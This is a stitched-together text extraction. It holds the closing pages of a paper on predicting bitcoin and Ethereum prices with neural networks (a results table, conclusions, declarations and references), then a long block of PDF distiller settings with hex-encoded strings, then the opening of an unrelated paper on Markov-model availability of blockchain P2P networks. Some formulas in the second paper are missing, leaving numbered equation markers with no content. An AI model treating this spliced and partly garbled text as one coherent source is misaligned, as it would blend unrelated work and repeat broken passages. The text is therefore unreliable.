MAPE’s values across the k-folds. The model with the lowest average results to be the best. It represents the model that has to be trained on all data. We selected the best model for the ANN and the best model for BNN. The former corresponds to a two stages framework, and the latter corresponds to a one stage framework, both for Bitcoin and Ethereum price prediction. Table 6 Statistics on ten samples of predicted bitcoin price expressed in US$ at (t +n)th day ahead of time, with n = 1, using BNN. Note that these values refer to the first ten samples of the testing dataset. The corresponding actual values are shown in the first column. Actual value Mean Std 0.01 Quantile 0.99 Quantile 7,169.8 7,162 50.5 7,038.9 7,275.1 7,646.2 7,586.8 56.5 7,473.7 7,716.9 7,990.4 7,860.1 58.4 7,715.1 7,992.8 8,062.6 7,913 56.6 7,787.6 8,045.3 7,983.7 7,688.4 46.6 7,600.1 7,801.6 7,196.2 7,600.1 44.9 7,500.3 7,713.1 7,328.6 7,723.7 48.4 7,610.6 7,843.6 7,943.2 7,835.7 46.5 7,733.1 7,936.3 7,902.4 7,916.7 46.4 7,814.6 8,047.5 7,950.6 7,876.6 47.6 7,772.9 8,001.2 Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 19/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Results show that the predicted bitcoin prices by the BNN have a MAPE in accord with those reported in the works present in the literature. Furthermore, the performance of some proposed two stages frameworks, SVR+FFNN and SVR+LSTMNN, show a clear improvement with respect to those of the correspondent one stage frameworks, and the goodness of some two stages frameworks’ predictions is close to that obtained by the BNN. The goal of this work is to give useful insights to build efficient frameworks for trading. The proposed frameworks could be used to decide when and how much to invest, and also to build efficient bitcoin trading strategies in a market highly volatile, in which short term trading may give several opportunities to make profit when correct trading strategies are applied. The novelty of this work consists in the model selection, by applying the k-fold cross- validation method to 70% of the whole dataset, and in applying the Monte Carlo method during the training phase of the best selected architectures that takes the whole dataset into account, to predict cryptocurrency markets, specifically the Bitcoin and the Ethereum market. Future work aims to perform a more exhaustive optimization of all the proposed frameworks in this work, and to analyze their response in the case in which more inputs are taken into account. In fact, it is reasonable thinking that a more exhaustive optimization of the proposed frameworks and more inputs to train the networks will allow to obtain even higher performance. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research is supported by the research projects funded by the Sardegna Ricerche Public Body, POR Sardegna FESR 2014/2020 EU grants: “SardCoin - SardCoin: tecnologie blockchain a supporto del turismo in Sardegna”; Top-down Cluster Projects; “EasyWallet”; R&D Grants for R&D Projects; “Crypto-Trading”- R&D Grants for R&D Projects. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Sardegna Ricerche Public Body, POR Sardegna FESR: 2014/2020. Competing Interests The authors declare that they have no competing interests. Author Contributions � Luisanna Cocco conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 20/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ � Roberto Tonelli conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � Michele Marchesi conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data files are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.413#supplemental-information. REFERENCES Abraham D, Higdon D, Nelson J, Ibarra J. 2018. Cryptocurrency price prediction using tweet volumes and sentiment analysis. SMU Data Science Review 1(3):1–21. Akcora C, Dey AK, Gel Y, Kantarcioglu M. 2018. PAKDD: Forecasting bitcoin price with graph chainlets. PAKDD. Available at https://cakcora.github.io/blockchain/576.pdf. Anguita D, Ghelardoni L, Ghio A, Oneto L, Ridella S. 2012. The ’K’ in K-fold cross validation. In: European Symposium on Artificial Neural Networks, Computational Intelligence and Machine Learning, 25–27 April 2012. Bruges, 441–446. Brownlee J. 2017a. How to convert a time series to a supervised learning problem in Python. Available at https://machinelearningmastery.com/convert-time-series-supervised-learning- problem-python/ (accessed 27 November 2020). Brownlee J. 2017b. Multistep time series forecasting with lstms in Python. Available at https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term- memory-networks-python/ (accessed 27 November 2020). Brownlee J. 2017c. What is the difference between test and validation datasets? Available at https://machinelearningmastery.com/difference-test-validation-datasets/ (accessed 27 November 2020). Chen Z, Li C, Sun W. 2020. Bitcoin price prediction using machine learning: an approach to sample dimension engineering. Journal of Computational and Applied Mathematics 365(1):112395 DOI 10.1016/j.cam.2019.112395. Chih-Hung W, Yu-Feng M, Chih-Hung L. 2018. A new forecasting framework for bitcoin price with lstm. In: IEEE International Conference on Data Mining Workshops (ICDMW). Cocco L, Tonelli R, Marchesi M. 2019. An agent-based artificial market model for studying the bitcoin trading. IEEE Access 7(42908):42920 DOI 10.1109/Access.6287639. Greaves AS, Au B. 2015. Using the bitcoin transaction graph to predict the price of bitcoin. Available at https://pdfs.semanticscholar.org/a0ce/864663c100582805ffa88918910da89add47.pdf. Huang JZ, Huang W, Ni J. 2018. Predicting bitcoin returns using high-dimensional technical indicators. Journal of Finance and Data Science 5(3):140–155 DOI 10.1016/j.jfds.2018.10.001. Indera NI, Yassin I, Zabidi A, Rizman ZI. 2018. Non linear autoregressive with exogenous input (narx) bitcoin price prediction model using pso-optimized parameters and moving average technical indicators. Journal of Fundamental and Applied Sciences 9(3S):791–808 DOI 10.4314/jfas.v9i3s.61. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 21/23 http://dx.doi.org/10.7717/peerj-cs.413#supplemental-information http://dx.doi.org/10.7717/peerj-cs.413#supplemental-information http://dx.doi.org/10.7717/peerj-cs.413#supplemental-information https://cakcora.github.io/blockchain/576.pdf https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/convert-time-series-supervised-learning-problem-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/multi-step-time-series-forecasting-long-short-term-memory-networks-python/ https://machinelearningmastery.com/difference-test-validation-datasets/ http://dx.doi.org/10.1016/j.cam.2019.112395 http://dx.doi.org/10.1109/Access.6287639 https://pdfs.semanticscholar.org/a0ce/864663c100582805ffa88918910da89add47.pdf http://dx.doi.org/10.1016/j.jfds.2018.10.001 http://dx.doi.org/10.4314/jfas.v9i3s.61 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Jang H, Lee J. 2018. An empirical study on modeling and prediction of bitcoin prices with Bayesian neural networks based on blockchain information. IEEE Access 6:5427–5437 DOI 10.1109/ACCESS.2017.2779181. Jang H, Lee J, Ko H, Lee W. 2018. Predicting bitcoin prices by using rolling window LSTM model. In: Proceedings of KDD Data Science in Fintech Workshop (DSF). New York: ACM, 1–9. Ji S, Kim J, Im H. 2019. A comparative study of bitcoin price prediction using deep learning. Mathematics 7(10):7–898 DOI 10.3390/math7100898. Kingma DP, Adam JB. 2015. A method for stochastic optimization. In: 3rd International Conference for Learning Representations ICLR, San Diego, CA. Kirkpatrick CD, Dahlquist JR. 2006. Technical analysis: the complete resource for financial market technicians. Second Edition. Upper Saddle River: Financial Times Press. Kuhn M, Johnson K. 2013. Applied predictive modeling. New York: Springer-Verlag. Lahmiri S, Bekiros S. 2019. Cryptocurrency forecasting with deep learning chaotic neural networks. Chaos, Solitons & Fractals 118(C):35–40 DOI 10.1016/j.chaos.2018.11.014. Lamothe-Fernández P, Alaminos D, Lamothe-López P, Fernández-Gámez M. 2020. Deep learning methods for modeling bitcoin price. Mathematics 8(8):1245. Livieris I, Pintelas E, Stavroyiannis S, Pintelas P. 2020. Ensemble deep learning models for forecasting cryptocurrency time-series. Algorithms 13(5):121. Mallqui DA, Fernandes RAS. 2019. Predicting the direction, maximum, minimum and closing prices of daily bitcoin exchange rate using machine learning techniques. Applied Soft Computing 75(2):596–606 DOI 10.1016/j.asoc.2018.11.038. McNally S, Roche J, Caton S. 2016. Predicting the price of bitcoin using machine learning. In: 26th Euromicro International Conference on Parallel, Distributed, and Network-Based Processing, 21–23 March 2018. Cambridge, United Kingdom. Mudassir M, Bennbaia S, Unal D, Hammoudeh M. 2020. Time-series forecasting of bitcoin prices using high-dimensional features: a machine learning approach. Neural Computing & Applications 1–15 DOI 10.1007/s00521-020-05129-6. Munim Z, Shakil M, Alon I. 2019. Next-day bitcoin price forecast. Journal of Risk and Financial Management 12(2):1–15. Pant DR, Neupane P, Poudel A, Pokhrel AK, Lama BK. 2018. Recurrent neural network based bitcoin price prediction by twitter sentiment analysis. In: IEEE 3rd International Conference on Computing, Communication and Security (ICCCS), Kathmandu (Nepal). Patel J, Shah S, Thakkar P, Kotecha K. 2015. Predicting stock market index using fusion of machine learning techniques. Expert Systems with Applications 42(4):2162–2172 DOI 10.1016/j.eswa.2014.10.031. Phaladisailoed T, Numnonda T. 2018. Machine learning models comparison for bitcoin price prediction. In: 10th International Conference on Information Technology and Electrical Engineering (ICITEE), 24–26 July 2018. Indonesia. Rodriguez JD, Perez A, Lozano JA. 2010. Sensitivity analysis of k-fold cross validation in prediction error estimation. IEEE Transactions on Pattern Analysis and Machine Intelligence 32(3):569–575 DOI 10.1109/TPAMI.2009.187. Roy S, Nanjiba S, Chakrabarty A. 2018. Bitcoin price forecasting using time series analysis. In: 21st International Conference of Computer and Information Technology (ICCIT), 21–23 December 2018, United International University, Bangladesh. Shintate T, Pichl L. 2019. Trend prediction classification for high frequency bitcoin time series with deep learning. Journal Risk Financial Management 12(1):17. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 22/23 http://dx.doi.org/10.1109/ACCESS.2017.2779181 http://dx.doi.org/10.3390/math7100898 http://dx.doi.org/10.1016/j.chaos.2018.11.014 http://dx.doi.org/10.1016/j.asoc.2018.11.038 http://dx.doi.org/10.1007/s00521-020-05129-6 http://dx.doi.org/10.1016/j.eswa.2014.10.031 http://dx.doi.org/10.1109/TPAMI.2009.187 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Uras N, Marchesi L, Marchesi M, Tonelli R. 2020. Forecasting bitcoin closing price series using linear regression and neural networks models. PeerJ Computer Science 6(4):e279 DOI 10.7717/peerj-cs.279. Velankar S, Valecha S, Maji S. 2018. Bitcoin price prediction using machine learning. In: International Conference on Advanced Communications Technology (ICACT), 11–14 February 2018, Chuncheon, South Korea. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 23/23 http://dx.doi.org/10.7717/peerj-cs.279 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Predictions of bitcoin prices through machine learning based frameworks Introduction Related work Proposed frameworks Frameworks’ calibration and performance metric Results Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_cqzzh4tjajaz5jpicwx5hllhba ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-006 36 Research on Blockchain Availability Modeling in P2P Network Wang Zan School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 18309220452@163.com Fu Yanfang School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: fuyanfang3000@aliyun.com Zhong Lianjiong School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: zhongli5180@sina.com Dai Fei School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 8496579@qq.com Abstract—Blockchain establishes reliable trust among parties that do not know each other and achieves credible data sharing and point-to-point value transmission in an epoch-making way. The requirement of the availability of block chain network becomes more and more important due to the dynamic and changeable characteristics of block chain P2P network. Therefore, for the characteristics of block chain P2P network system, this paper constructs a availability model based on Markov stochastic process theory, analyzes the steady-state availability and instantaneous availability of the model, and finally carries out experimental verification through simulation, hoping to provide beneficial inspiration and guidance for future research on block chain network . Keywords—Blockchain; P2p; Markov; Availability I. INTRODUCTION Block chain is a distributed system composed of encryption mechanism, storage mechanism, consensus mechanism, which can realize the peer-to-peer trading function of mutual trust without central server. The biggest feature of blockchain is decentralization and distribution, and the consensus mechanism of blockchain enables participating nodes to jointly provide services for the system and realizes similar functions of financial intermediaries in the central system. As shown in Figure 1, blockchain system can achieve fast synchronization of data without central server and consistency of consensus mechanism through P2P network. P2P realizes the sharing of data resources and cooperation of services among terminal devices by means of direct exchange. However the dynamic and changeable of blockchain P2P network, the requirement of the availability of block chain network becomes more and more important. From the development trend of p2p network, the demand of modeling and verification evaluation on the availability of p2p network is more and more common and urgent. The establishment of high availability mailto:18309220452@163.com mailto:fuyanfang3000@aliyun.com mailto:zhongli5180@sina.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 37 network is the basis of accurate and timely information exchange, so as to meet the demand of network system to provide high reliable services for various users. consensus consistency InitTrans Address propagation discovery Message communication Check nodes seed nodes Flooding Distributed Hash Table consensus mechanism—p2p network Figure 1. The architecture of p2p networks in the blockchain II. RELATED WORK The traditional concept of availability is a typical measure of reliability in reliability theory. It is an important parameter in reliability engineering that combines maintainability to represent the effectiveness of the system. "Reliability" can only reflect the probability of failure of the network system or components, while "availability" can reflect the quality of the network by considering the repairability of the network. Therefore, analyzing the availability of tact network system is an important index to evaluate the design of system networking, system stability and maintenance ability. At present, availability studies mainly focus on the reliability and maintainability of the engineering capability of complex systems, and also on the availability of mission capability. Lianhong Zhou established the availability model of optical fiber communication system by using the state transfer equation[1]. Hailin Feng used Markov theory to study the steady-state availability of repairable network system, and analyzed the fuzzy availability of repairable network system and continuous kn(F) network. Fenghua Xie studied the availability of "N+X" UPS system and pointed out that the availability of parallel system was positively correlated with the number of redundant modules[2]. Jingle Zhang proposed a workflow availability modeling method based on random Petri net and studied and established the SPN model of e-commerce system[3]. Jikun Yang fused sample data with prior information, used fuzzy variables to deal with the uncertainty of sample data, and proposed a usability analysis method of navigation weapon system based on fuzzy Bayes[4]. Above all of these, we can find that the research on the availability of p2p network is relatively few and not very mature now. Therefore, research available technology based on P2P distributed collaborative network under different environmental conditions, analyze the unified modeling and expression of information, build a new generation of block chain network usability evaluation model, improve the information interaction and collaboration ability of block chain platform, and ensure the performance of system service and the formation of stable and reliable operation ability through availability technology. III. DISTRIBUTED P2P NETWORK STRUCTURE BASEDON BLOCK CHAIN Block chain technology is the first kind that can be globally distributed deployment of consensus agreement. Block chain system achieves efficient consensus through simple unauthenticated broadcast channel and block chain length competition mechanism. The typical blockchain system consists of network layer, consensus layer, data layer, intelligent contract layer and application layer[5]. The network layer is usually based on P2P protocol for communication between nodes; the consensus layer implements the consensus protocol, which can be freely selected according to the actual scenario, such as PoW based on workload proof, and PoS based on equity proof; the data layer is the data structure of the block chain, whose structural design is usually closely coupled with the application scenario according to the actual needs, each computing node is responsible for maintaining its own storage system; the intelligent International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 38 contract layer can perform different operations for different data input, this process is automatically executed based on the code, and consensus is reached across the network; the application layer is the basic business of the block chain system, such as financial services and data traceability, etc. There is no central node in the block chain network based p2p, and any two nodes can be directly traded, each node is free to join and exit at any time. Therefore, the block chain platform usually chooses the P2P protocol which is completely distributed and can tolerate single point of failure as the network transmission protocol. Block chain network nodes have the characteristics of equality, autonomy and distribution, presenting a flat topology without any centralized authority nodes or hierarchical structure (as shown in Figure 2). Each node has such functions as route discovery, broadcast transaction, and broadcast block and find new nodes[6]. In the blockchain network, the P2P protocol of the blockchain network is mainly used for the transfer of transaction data and block data between nodes. The node listens to the data broadcast in the network all the time. It can only be processed after by verifying the validity of these transactions and blocks when receives new transactions and new blocks sent by the neighbor node. C6 C1 C2 C5 C3 C4 Figure 2. P2P network topology IV. AVAILABILITY DEFINITION Reliability is defined as the ability of a product to perform specified functions under specified conditions and within specified time periods. The higher the reliability, the lower the failure rate of the product. The simplest expression for reliability can be expressed as an exponential distribution, which expresses random failure. （1） Where, t is mission time， is failure rate. Availability is defined as the ability to be in a state of executable function under specified conditions and at specified times or time intervals, provided that the required external resources are guaranteed. It is the comprehensive reflection of product reliability, maintainability and maintenance guarantee. The formula is as follows: (2) MTBF(Mean Time Between Failure)refers to the average working time between two adjacent failures and is a reliability indicator of a product. MTTR(Mean Time To Repair)describes the average repair time when a product changes from a failure state to a working state. In engineering, MTTR is a measure of the maintainability of a product, which is common in maintenance contracts and is used as a measure of service charges. According to the above analysis, "reliability" only reflects the probability of failure of the network system or 